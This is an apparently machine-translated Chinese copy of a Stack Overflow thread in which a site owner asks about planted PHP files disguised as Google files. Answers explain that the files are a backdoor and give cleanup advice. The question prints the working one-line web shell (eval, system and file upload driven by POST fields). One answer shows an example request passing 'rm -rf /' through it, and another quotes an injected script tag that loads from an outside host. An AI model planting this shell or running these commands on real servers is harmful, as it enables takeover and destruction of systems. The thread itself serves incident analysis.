这个 PHP 代码/hack 的目的是啥？

Posted 2023-03-04

【中文标题】这个 PHP 代码/hack 的目的是啥？

【英文标题】：What's the purpose of this PHP code/hack.?这个 PHP 代码/hack 的目的是什么？

【发布时间】：2011-03-11 16:24:27

【问题描述】：

我最近在我的服务器上发现了 4 个奇怪的文件（我没有上传）。文件名是这样的：goog1e7a20543b128921.php

这是其中的代码：

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e)eval($e);if($s)system($s);if($_FILES['f']['name']!='')move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);?>

你知道这段代码应该做什么......吗？ 我应该开始恐慌吗..？

谢谢。

【问题讨论】：

它没有好的目的，似乎是表单欺骗。

看起来可能与某种 google 服务、分析或结帐有关？

@Matt Ellen：Google 不会在您的网络服务器上上传文件。他们可能会要求您这样做（例如，出于授权目的），但他们永远不会自己这样做。此外，尽管 Google 的员工都是极客，但他们不会将公司名称拼错为 Goog1e 并将他们的服务拼写为 analist...Goog1e_analist 只是一个（非常糟糕的）诱饵，让您相信这是一些 Google 文件这样你就不会删除它。

“休斯顿，我们遇到了问题”。检查文件的最后编辑和所有者，也许有人入侵了你的 ftp。

有人应该告诉他们...google.ch/…

【参考方案1】：

是的，这是恶意代码。 如果攻击者知道传递给它的参数，这个 shell 脚本将允许执行代码以及上传任何文件。 我建议在所有文件中搜索该代码，验证文件权限并更改密码以防万一。

【参考方案2】：

应对攻击的建议

我建议您使用html Purifier 或OWASP 来确保安全。

如果您不使用 eval 构造，您必须禁用它（除非确实需要，否则不应该这样做）。

分析任何安全漏洞的服务器设置：

PHPSecInfo

_{（来源：phpsec.org）}

【讨论】：

我一定会检查这些工具。谢谢。

@pnichols：是的，你绝对应该 :)

【参考方案3】：

删除它们正确现在！

这是您网络服务器的后门。 它允许攻击者向http://you.com/goog1e7a20543b128921.php?s=rm -rf / 发送请求以删除您的整个系统。

然后，您应该对您的网站进行彻底的安全审查，以确定他们最初是如何到达那里的。

【讨论】：

不！将其移至安全的地方，而不是删除。您可能需要它来进行取证。

@mhaller：你指的是什么取证目的？这不是一些复杂的病毒/rootkit。这是一段非常简单的代码，除了攻击者拼写不佳之外，您无法从中收集到太多信息。

实际上，POST 数据不像 GET 请求那样编码在 URI 中。它在所有标头之后作为消息体传输。

@Lèse Majesté：例如文件创建时的时间戳；十六进制代码是否始终相同或随机；使用了哪种形式的 vars；创建文件的系统用户（例如 apache 或 root 或其他守护程序用户......）之类的东西。是的，这件事很简单，但无论如何你应该对所有恶意脚本都这样做

啊...是的，我想您应该在删除之前记录这些内容。是否有软件可以记录类似的文件系统活动（例如，每当有人创建/编辑/打开/删除文件或目录时记录条目）？

【参考方案4】：

供参考：

if($e)eval($e);

这允许攻击者执行他们想要的任何 PHP 命令。

if($s)system($s);

这允许攻击者执行他们想要的任何系统命令，就像你的网络服务器运行的任何用户一样。

if($_FILES['f']['name']!='')move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);

这允许攻击者上传他们想要的任何文件 - 再次由您的网络服务器运行的用户决定文件权限。

总之，恐慌：-p

我相信网上有很多关于如何处理这个问题的文章。简而言之，备份您的系统以便稍后进行分析，从头开始重新安装服务器（您不知道他们还对您做了什么，所以仅仅删除文件是不够的。）同时试图弄清楚它们是如何进入的堵住这个洞。

【参考方案5】：

eval($e) - 远程执行命令 系统 - eq。对于listind目录 $_FILES['f']['name'] - 用于将脚本上传到服务器 eq hack 工具等

【参考方案6】：

显然你不是唯一拥有这些的人。谷歌搜索它真的很快，其他网站似乎也被感染了。看起来受感染的文件总是将自己存储在 images 文件夹中。

【讨论】：

shine.yahoo.com/channel/life/goog1e-start-up-kit-scam-443472 您注册了 Google 服务吗？毕竟可能不是谷歌

@abjoa：正如我在对 Google 永远不会在您的主机上上传文件的问题的其他评论中所说的那样。

@nico 是的，但是一个伪装成 Google 的服务，这就是链接文章所指的内容

@abjoa：抱歉，我没有在您的评论中看到not :)

【参考方案7】：

相关：尝试安装 phpAntiVirus 以备将来使用，并向您的提供商询问 mod_security。这可能会减轻未来的黑客攻击。无论如何，这些文件并没有在您的服务器上全部实现。摆脱所有旧的 PHP 应用程序。

【参考方案8】：

在每个文件中查找它。 <script src="http://nt02.co.in/3"></script> 如果你找到一个使用你的 ftp 的文件，请查看文件的修改日期并打开该日期修改的所有文件并将其删除。